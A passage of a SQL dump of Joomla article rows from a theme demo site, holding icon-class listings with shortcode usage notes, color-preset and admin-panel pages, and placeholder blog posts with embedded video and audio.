class=\"uk-icon-long-arrow-right\"></i> icon-long-arrow-right</li>\r\n    <li><i class=\"uk-icon-long-arrow-up\"></i> icon-long-arrow-up</li>\r\n    <li><i class=\"uk-icon-toggle-down\"></i> icon-toggle-down <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-toggle-left\"></i> icon-toggle-left <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-toggle-right\"></i> icon-toggle-right <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-toggle-up\"></i> icon-toggle-up <span class=\"uk-text-muted\">(alias)</span></li>\r\n</ul>\r\n\r\n<hr class=\"uk-article-divider\">\r\n\r\n[heading size=\"h2\" style=\"module-title uk-margin-large-top\"]Video Player Icons[/heading]\r\n\r\n<ul class=\"uk-grid uk-grid-width-small-1-1 uk-grid-width-medium-1-2 uk-grid-width-large-1-4 list-icons\">\r\n    <li><i class=\"uk-icon-arrows-alt\"></i> icon-arrows-alt</li>\r\n    <li><i class=\"uk-icon-backward\"></i> icon-backward</li>\r\n    <li><i class=\"uk-icon-compress\"></i> icon-compress</li>\r\n    <li><i class=\"uk-icon-eject\"></i> icon-eject</li>\r\n    <li><i class=\"uk-icon-expand\"></i> icon-expand</li>\r\n    <li><i class=\"uk-icon-fast-backward\"></i> icon-fast-backward</li>\r\n    <li><i class=\"uk-icon-fast-forward\"></i> icon-fast-forward</li>\r\n    <li><i class=\"uk-icon-forward\"></i> icon-forward</li>\r\n    <li><i class=\"uk-icon-pause\"></i> icon-pause</li>\r\n    <li><i class=\"uk-icon-play\"></i> icon-play</li>\r\n    <li><i class=\"uk-icon-play-circle\"></i> icon-play-circle</li>\r\n    <li><i class=\"uk-icon-play-circle-o\"></i> icon-play-circle-o</li>\r\n    <li><i class=\"uk-icon-step-backward\"></i> icon-step-backward</li>\r\n    <li><i class=\"uk-icon-step-forward\"></i> icon-step-forward</li>\r\n    <li><i class=\"uk-icon-stop\"></i> icon-stop</li>\r\n    <li><i class=\"uk-icon-youtube-play\"></i> icon-youtube-play</li>\r\n</ul>\r\n\r\n<hr class=\"uk-article-divider\">\r\n\r\n[heading size=\"h2\" style=\"module-title uk-margin-large-top\"]Brand Icons[/heading]\r\n\r\n<ul class=\"uk-grid uk-grid-width-small-1-1 uk-grid-width-medium-1-2 uk-grid-width-large-1-4 list-icons\">\r\n    <li><i class=\"uk-icon-500px\"></i> icon-500px</li>\r\n    <li><i class=\"uk-icon-adn\"></i> icon-adn</li>\r\n    <li><i class=\"uk-icon-amazon\"></i> icon-amazon</li>\r\n    <li><i class=\"uk-icon-android\"></i> icon-android</li>\r\n    <li><i class=\"uk-icon-angellist\"></i> icon-angellist</li>\r\n    <li><i class=\"uk-icon-apple\"></i> icon-apple</li>\r\n    <li><i class=\"uk-icon-behance\"></i> icon-behance</li>\r\n    <li><i class=\"uk-icon-behance-square\"></i> icon-behance-square</li>\r\n    <li><i class=\"uk-icon-bitbucket\"></i> icon-bitbucket</li>\r\n    <li><i class=\"uk-icon-bitbucket-square\"></i> icon-bitbucket-square</li>\r\n    <li><i class=\"uk-icon-bitcoin\"></i> icon-bitcoin <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-black-tie\"></i> icon-black-tie</li>\r\n    <li><i class=\"uk-icon-btc\"></i> icon-btc</li>\r\n    <li><i class=\"uk-icon-buysellads\"></i> icon-buysellads</li>\r\n    <li><i class=\"uk-icon-cc-amex\"></i> icon-cc-amex</li>\r\n    <li><i class=\"uk-icon-cc-diners-club\"></i> icon-cc-diners-club</li>\r\n    <li><i class=\"uk-icon-cc-discover\"></i> icon-cc-discover</li>\r\n    <li><i class=\"uk-icon-cc-jcb\"></i> icon-cc-jcb</li>\r\n    <li><i class=\"uk-icon-cc-mastercard\"></i> icon-cc-mastercard</li>\r\n    <li><i class=\"uk-icon-cc-paypal\"></i> icon-cc-paypal</li>\r\n    <li><i class=\"uk-icon-cc-stripe\"></i> icon-cc-stripe</li>\r\n    <li><i class=\"uk-icon-cc-visa\"></i> icon-cc-visa</li>\r\n    <li><i class=\"uk-icon-chrome\"></i> icon-chrome</li>\r\n    <li><i class=\"uk-icon-codepen\"></i> icon-codepen</li>\r\n    <li><i class=\"uk-icon-connectdevelop\"></i> icon-connectdevelop</li>\r\n    <li><i class=\"uk-icon-contao\"></i> icon-contao</li>\r\n    <li><i class=\"uk-icon-css3\"></i> icon-css3</li>\r\n    <li><i class=\"uk-icon-dashcube\"></i> icon-dashcube</li>\r\n    <li><i class=\"uk-icon-delicious\"></i> icon-delicious</li>\r\n    <li><i class=\"uk-icon-deviantart\"></i> icon-deviantart</li>\r\n    <li><i class=\"uk-icon-digg\"></i> icon-digg</li>\r\n    <li><i class=\"uk-icon-dribbble\"></i> icon-dribbble</li>\r\n    <li><i class=\"uk-icon-dropbox\"></i> icon-dropbox</li>\r\n    <li><i class=\"uk-icon-drupal\"></i> icon-drupal</li>\r\n    <li><i class=\"uk-icon-empire\"></i> icon-empire</li>\r\n    <li><i class=\"uk-icon-expeditedssl\"></i> icon-expeditedssl</li>\r\n    <li><i class=\"uk-icon-facebook\"></i> icon-facebook</li>\r\n    <li><i class=\"uk-icon-facebook-f\"></i> icon-facebook-f <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-facebook-official\"></i> icon-facebook-official</li>\r\n    <li><i class=\"uk-icon-facebook-square\"></i> icon-facebook-square</li>\r\n    <li><i class=\"uk-icon-firefox\"></i> icon-firefox</li>\r\n    <li><i class=\"uk-icon-flickr\"></i> icon-flickr</li>\r\n    <li><i class=\"uk-icon-fonticons\"></i> icon-fonticons</li>\r\n    <li><i class=\"uk-icon-forumbee\"></i> icon-forumbee</li>\r\n    <li><i class=\"uk-icon-foursquare\"></i> icon-foursquare</li>\r\n    <li><i class=\"uk-icon-ge\"></i> icon-ge <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-get-pocket\"></i> icon-get-pocket</li>\r\n    <li><i class=\"uk-icon-gg\"></i> icon-gg</li>\r\n    <li><i class=\"uk-icon-gg-circle\"></i> icon-gg-circle</li>\r\n    <li><i class=\"uk-icon-git\"></i> icon-git</li>\r\n    <li><i class=\"uk-icon-git-square\"></i> icon-git-square</li>\r\n    <li><i class=\"uk-icon-github\"></i> icon-github</li>\r\n    <li><i class=\"uk-icon-github-alt\"></i> icon-github-alt</li>\r\n    <li><i class=\"uk-icon-github-square\"></i> icon-github-square</li>\r\n    <li><i class=\"uk-icon-gittip\"></i> icon-gittip <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-google\"></i> icon-google</li>\r\n    <li><i class=\"uk-icon-google-plus\"></i> icon-google-plus</li>\r\n    <li><i class=\"uk-icon-google-plus-square\"></i> icon-google-plus-square</li>\r\n    <li><i class=\"uk-icon-google-wallet\"></i> icon-google-wallet</li>\r\n    <li><i class=\"uk-icon-gratipay\"></i> icon-gratipay</li>\r\n    <li><i class=\"uk-icon-hacker-news\"></i> icon-hacker-news</li>\r\n    <li><i class=\"uk-icon-houzz\"></i> icon-houzz</li>\r\n    <li><i class=\"uk-icon-html5\"></i> icon-html5</li>\r\n    <li><i class=\"uk-icon-instagram\"></i> icon-instagram</li>\r\n    <li><i class=\"uk-icon-internet-explorer\"></i> icon-internet-explorer</li>\r\n    <li><i class=\"uk-icon-ioxhost\"></i> icon-ioxhost</li>\r\n    <li><i class=\"uk-icon-joomla\"></i> icon-joomla</li>\r\n    <li><i class=\"uk-icon-jsfiddle\"></i> icon-jsfiddle</li>\r\n    <li><i class=\"uk-icon-lastfm\"></i> icon-lastfm</li>\r\n    <li><i class=\"uk-icon-lastfm-square\"></i> icon-lastfm-square</li>\r\n    <li><i class=\"uk-icon-leanpub\"></i> icon-leanpub</li>\r\n    <li><i class=\"uk-icon-linkedin\"></i> icon-linkedin</li>\r\n    <li><i class=\"uk-icon-linkedin-square\"></i> icon-linkedin-square</li>\r\n    <li><i class=\"uk-icon-linux\"></i> icon-linux</li>\r\n    <li><i class=\"uk-icon-maxcdn\"></i> icon-maxcdn</li>\r\n    <li><i class=\"uk-icon-meanpath\"></i> icon-meanpath</li>\r\n    <li><i class=\"uk-icon-medium-logo\"></i> icon-medium-logo</li>\r\n    <li><i class=\"uk-icon-odnoklassniki\"></i> icon-odnoklassniki</li>\r\n    <li><i class=\"uk-icon-odnoklassniki-square\"></i> icon-odnoklassniki-square</li>\r\n    <li><i class=\"uk-icon-opencart\"></i> icon-opencart</li>\r\n    <li><i class=\"uk-icon-openid\"></i> icon-openid</li>\r\n    <li><i class=\"uk-icon-opera\"></i> icon-opera</li>\r\n    <li><i class=\"uk-icon-optin-monster\"></i> icon-optin-monster</li>\r\n    <li><i class=\"uk-icon-pagelines\"></i> icon-pagelines</li>\r\n    <li><i class=\"uk-icon-paypal\"></i> icon-paypal</li>\r\n    <li><i class=\"uk-icon-pied-piper\"></i> icon-pied-piper</li>\r\n    <li><i class=\"uk-icon-pied-piper-alt\"></i> icon-pied-piper-alt</li>\r\n    <li><i class=\"uk-icon-pinterest\"></i> icon-pinterest</li>\r\n    <li><i class=\"uk-icon-pinterest-p\"></i> icon-pinterest-p</li>\r\n    <li><i class=\"uk-icon-pinterest-square\"></i> icon-pinterest-square</li>\r\n    <li><i class=\"uk-icon-qq\"></i> icon-qq</li>\r\n    <li><i class=\"uk-icon-ra\"></i> icon-ra <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-rebel\"></i> icon-rebel</li>\r\n    <li><i class=\"uk-icon-reddit\"></i> icon-reddit</li>\r\n    <li><i class=\"uk-icon-reddit-square\"></i> icon-reddit-square</li>\r\n    <li><i class=\"uk-icon-renren\"></i> icon-renren</li>\r\n    <li><i class=\"uk-icon-safari\"></i> icon-safari</li>\r\n    <li><i class=\"uk-icon-sellsy\"></i> icon-sellsy</li>\r\n    <li><i class=\"uk-icon-share-alt\"></i> icon-share-alt</li>\r\n    <li><i class=\"uk-icon-share-alt-square\"></i> icon-share-alt-square</li>\r\n    <li><i class=\"uk-icon-shirtsinbulk\"></i> icon-shirtsinbulk</li>\r\n    <li><i class=\"uk-icon-simplybuilt\"></i> icon-simplybuilt</li>\r\n    <li><i class=\"uk-icon-skyatlas\"></i> icon-skyatlas</li>\r\n    <li><i class=\"uk-icon-skype\"></i> icon-skype</li>\r\n    <li><i class=\"uk-icon-slack\"></i> icon-slack</li>\r\n    <li><i class=\"uk-icon-slideshare\"></i> icon-slideshare</li>\r\n    <li><i class=\"uk-icon-soundcloud\"></i> icon-soundcloud</li>\r\n    <li><i class=\"uk-icon-spotify\"></i> icon-spotify</li>\r\n    <li><i class=\"uk-icon-stack-exchange\"></i> icon-stack-exchange</li>\r\n    <li><i class=\"uk-icon-stack-overflow\"></i> icon-stack-overflow</li>\r\n    <li><i class=\"uk-icon-steam\"></i> icon-steam</li>\r\n    <li><i class=\"uk-icon-steam-square\"></i> icon-steam-square</li>\r\n    <li><i class=\"uk-icon-stumbleupon\"></i> icon-stumbleupon</li>\r\n    <li><i class=\"uk-icon-stumbleupon-circle\"></i> icon-stumbleupon-circle</li>\r\n    <li><i class=\"uk-icon-tencent-weibo\"></i> icon-tencent-weibo</li>\r\n    <li><i class=\"uk-icon-trello\"></i> icon-trello</li>\r\n    <li><i class=\"uk-icon-tripadvisor\"></i> icon-tripadvisor</li>\r\n    <li><i class=\"uk-icon-tumblr\"></i> icon-tumblr</li>\r\n    <li><i class=\"uk-icon-tumblr-square\"></i> icon-tumblr-square</li>\r\n    <li><i class=\"uk-icon-twitch\"></i> icon-twitch</li>\r\n    <li><i class=\"uk-icon-twitter\"></i> icon-twitter</li>\r\n    <li><i class=\"uk-icon-twitter-square\"></i> icon-twitter-square</li>\r\n    <li><i class=\"uk-icon-viacoin\"></i> icon-viacoin</li>\r\n    <li><i class=\"uk-icon-vimeo\"></i> icon-vimeo</li>\r\n    <li><i class=\"uk-icon-vimeo-square\"></i> icon-vimeo-square</li>\r\n    <li><i class=\"uk-icon-vine\"></i> icon-vine</li>\r\n    <li><i class=\"uk-icon-vk\"></i> icon-vk</li>\r\n    <li><i class=\"uk-icon-wechat\"></i> icon-wechat <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-weibo\"></i> icon-weibo</li>\r\n    <li><i class=\"uk-icon-weixin\"></i> icon-weixin</li>\r\n    <li><i class=\"uk-icon-whatsapp\"></i> icon-whatsapp</li>\r\n    <li><i class=\"uk-icon-wikipedia-w\"></i> icon-wikipedia-w</li>\r\n    <li><i class=\"uk-icon-windows\"></i> icon-windows</li>\r\n    <li><i class=\"uk-icon-wordpress\"></i> icon-wordpress</li>\r\n    <li><i class=\"uk-icon-xing\"></i> icon-xing</li>\r\n    <li><i class=\"uk-icon-xing-square\"></i> icon-xing-square</li>\r\n    <li><i class=\"uk-icon-y-combinator\"></i> icon-y-combinator</li>\r\n    <li><i class=\"uk-icon-y-combinator-square\"></i> icon-y-combinator-square</li>\r\n    <li><i class=\"uk-icon-yahoo\"></i> icon-yahoo</li>\r\n    <li><i class=\"uk-icon-yc\"></i> icon-yc <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-yc-square\"></i> icon-yc-square <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-yelp\"></i> icon-yelp</li>\r\n    <li><i class=\"uk-icon-youtube\"></i> icon-youtube</li>\r\n    <li><i class=\"uk-icon-youtube-play\"></i> icon-youtube-play</li>\r\n    <li><i class=\"uk-icon-youtube-square\"></i> icon-youtube-square</li>\r\n</ul>\r\n\r\n<hr class=\"uk-article-divider\">\r\n\r\n[heading size=\"h2\" style=\"module-title uk-margin-large-top\"]Medical Icons[/heading]\r\n\r\n<ul class=\"uk-grid uk-grid-width-small-1-1 uk-grid-width-medium-1-2 uk-grid-width-large-1-4 list-icons\">\r\n    <li><i class=\"uk-icon-ambulance\"></i> icon-ambulance</li>\r\n    <li><i class=\"uk-icon-h-square\"></i> icon-h-square</li>\r\n    <li><i class=\"uk-icon-hospital-o\"></i> icon-hospital-o</li>\r\n    <li><i class=\"uk-icon-medkit\"></i> icon-medkit</li>\r\n    <li><i class=\"uk-icon-plus-square\"></i> icon-plus-square</li>\r\n    <li><i class=\"uk-icon-stethoscope\"></i> icon-stethoscope</li>\r\n    <li><i class=\"uk-icon-user-md\"></i> icon-user-md</li>\r\n    <li><i class=\"uk-icon-wheelchair\"></i> icon-wheelchair</li>\r\n</ul>\r\n      </div>\r\n<br>\r\n\r\n[heading size=\"h3\" style=\"dotted\"]Icon font classes[/heading]\r\n\r\n<p>Icons can be added in menus, lists, buttons, modules, and basically, in any content. These icons are made available by <a href=\"http://fortawesome.github.io/Font-Awesome/\" target=\"_blank\">Font Awesome</a>. These icons use icon fonts which ensures they look sharp even on retina displays.</p>\r\n\r\n[badge style=\"note uk-margin-top\"]markup[/badge]\r\n<pre><i>[</i>icon style=\"icon-gear\"/]</pre><br/>\r\n\r\n[heading size=\"h3\" style=\"dotted\"]Adding icons to Menu items[/heading]\r\n<p>To add an icon to a menu item, create/edit a menu item > on the menu edit screen, click on \'Link type options\' tab > on the \'link CSS style\' option, add the icon name e.g <code>icon-group</code></p>\r\n\r\n[heading size=\"h3\" style=\"dotted\"]Adding icons to Modules[/heading]\r\n<p>To add an icon to a module, create/edit a module  > on the module edit screen, click on \'Advanced options\' tab > on the \'Module Class Suffix\' option, add the icon name e.g <code>icon-comments</code></p>\r\n\r\n[heading size=\"h3\" style=\"dotted\"]Adding icons to lists[/heading]\r\n<p>To add an icon to a list, use the <code>list</code> shortcode and apply the \'list-icons\' style > then specify the icon name in the list items. You can see more examples <a href=\"index.php?option=com_content&view=article&id=4&Itemid=104#lists\">here</a></p>\r\n\r\n[badge style=\"note uk-margin-top\"]markup[/badge]\r\n      <pre><i>[</i>list style=\"list-icons\"]\r\n   <i>[</i>li icon=\"icon-asterisk\"]List Item 1<i>[</i>/li]\r\n   <i>[</i>li icon=\"icon-asterisk\"]List Item 2<i>[</i>/li]\r\n   <i>[</i>li icon=\"icon-asterisk\"]List Item 3<i>[</i>/li]\r\n<i>[</i>/list]</pre>', '', 1, 2, '2014-07-17 08:42:50', 196, '', '2015-10-16 10:02:48', 42, 0, '0000-00-00 00:00:00', '2014-07-17 08:42:50', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 7, 12, '', '', 1, 468, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', '');
INSERT INTO `y57u5_content` (`id`, `asset_id`, `title`, `alias`, `introtext`, `fulltext`, `state`, `catid`, `created`, `created_by`, `created_by_alias`, `modified`, `modified_by`, `checked_out`, `checked_out_time`, `publish_up`, `publish_down`, `images`, `urls`, `attribs`, `version`, `ordering`, `metakey`, `metadesc`, `access`, `hits`, `metadata`, `featured`, `language`, `xreference`, `note`) VALUES
(96, 229, 'Color Styles', 'color-styles', '<p>\r\n  This theme comes packed with 5 color presets. The template settings also allows you to create an unlimited color profiles using the color pickers and pre-defined background settings. <a href=\"index.php?option=com_content&view=article&id=97&Itemid=773\">Check out the admin panel</a> to see available options in the template backend.\r\n</p><br/>\r\n\r\n[grid]\r\n[column size=\"1-3\"]\r\n<a href=\"?profile=default\"><img src=\"images/demo/colors/1.png\" alt=\"crimson\" width=\"260\" height=\"496\"></a>\r\n[/column]\r\n\r\n[column size=\"1-3\"]\r\n<a href=\"?profile=olive\"><img src=\"images/demo/colors/2.png\" alt=\"olive\"  width=\"260\" height=\"496\"></a>\r\n[/column]\r\n\r\n[column size=\"1-3\"]\r\n<a href=\"?profile=azure\"><img src=\"images/demo/colors/3.png\" alt=\"azure\" width=\"260\" height=\"496\"></a>\r\n[/column]\r\n\r\n[column size=\"1-3\"]\r\n<a href=\"?profile=mustard\"><img src=\"images/demo/colors/4.png\" alt=\"mustard\" width=\"260\" height=\"496\"></a>\r\n[/column]\r\n\r\n[column size=\"1-3\"]\r\n<a href=\"?profile=salmon\"><img src=\"images/demo/colors/5.png\" alt=\"salmon\"  width=\"260\" height=\"496\"></a>\r\n[/column]\r\n\r\n[column size=\"1-3\"]\r\n<a href=\"index.php?option=com_content&view=article&id=97&Itemid=773\"><img src=\"images/demo/colors/6.png\" alt=\"create your own\"  width=\"260\" height=\"496\"/></a>\r\n[/column]\r\n\r\n[/grid]', '', 1, 2, '2014-07-23 13:29:51', 196, '', '2015-10-16 09:46:23', 42, 0, '0000-00-00 00:00:00', '2014-07-23 13:29:51', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 11, 11, '', '', 1, 511, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(97, 230, 'Admin Panel', 'admin-panel', '<p>\r\n  This theme is built on <a href=\"http://www.warp-framework.org\" target=\"_blank\">Warp Framework</a> to give you the best experience in building your site. Warp framework is a light weight frameworkm, created by YOOtheme, which is built on a grid system and modular structure. </p>\r\n\r\n<p>To make it even more intuitive, we\'ve coded the frontend with UIkit. <a href=\"http://www.getuikit.com\" target=\"_blank\">Uikit</a> gives you a comprehensive collection of HTML, CSS, and JS components which is simple to use, easy to customize and extendable.\r\n</p><br/>\r\n\r\n<img src=\"images/demo/features/admin-options-1.png\" alt=\"admin options\" width=\"845\" height=\"1163\"/>\r\n<img src=\"images/demo/features/admin-options-2.png\" alt=\"admin options\" width=\"845\" height=\"1123\" />\r\n<img src=\"images/demo/features/admin-options-3.png\" alt=\"admin options\" width=\"845\" height=\"1097\" />\r\n<img src=\"images/demo/features/admin-options-4.png\" alt=\"admin options\" width=\"845\" height=\"1027\" />', '', 1, 2, '2014-07-23 13:30:16', 196, '', '2015-03-27 15:39:54', 42, 0, '0000-00-00 00:00:00', '2014-07-23 13:30:16', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 4, 10, '', '', 1, 488, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(98, 259, 'Inspiration comes from within', 'inspiration-comes-from-within', '[video width=\"100%\" height=\"420\" poster=\"images/demo/video/movie_bg.png\"]\r\n   [source type=\"video/mp4\" url=\"images/demo/video/envato_sting.mp4\"][/source]\r\n   [source type=\"video/ogg\" url=\"images/demo/video/envato_sting.ogv\"][/source]\r\n   [source type=\"video/webm\" url=\"images/demo/video/envato_sting.webm\"][/source]\r\n[/video]\r\n\r\n<p class=\"dropcap\">Perhaps travel cannot prevent bigotry, but by demonstrating that all peoples cry, laugh, eat, worry, and die, it can introduce the idea that if we try and understand each other, we may even become friends.<p>\r\n\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n', '\r\n  \r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.</p>\r\n\r\n[blockquote author=\"unknown\"]\r\nBelieve in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy.\r\n[/blockquote]\r\n  \r\n<p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 1, 22, '2014-07-21 07:08:00', 196, '', '2014-07-26 07:20:24', 42, 0, '0000-00-00 00:00:00', '2014-07-21 07:08:00', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 2, 1, '', '', 1, 479, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(99, 260, 'Audio jungle comes alive', 'audio-jungle-comes-alive', '<br/>\r\n<iframe width=\"100%\" height=\"166\" scrolling=\"no\" frameborder=\"no\" src=\"https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/118951274\"></iframe>\r\n\r\n<p class=\"dropcap\">Perhaps travel cannot prevent bigotry, but by demonstrating that all peoples cry, laugh, eat, worry, and die, it can introduce the idea that if we try and understand each other, we may even become friends.<p>\r\n\r\n', '\r\n  \r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n  \r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.</p>\r\n\r\n[blockquote author=\"unknown\"]\r\nBelieve in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy.\r\n[/blockquote]\r\n  \r\n<p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 1, 22, '2014-07-07 07:09:00', 196, '', '2014-07-26 07:23:51', 42, 0, '0000-00-00 00:00:00', '2014-07-07 07:09:00', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 3, 0, '', '', 1, 479, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
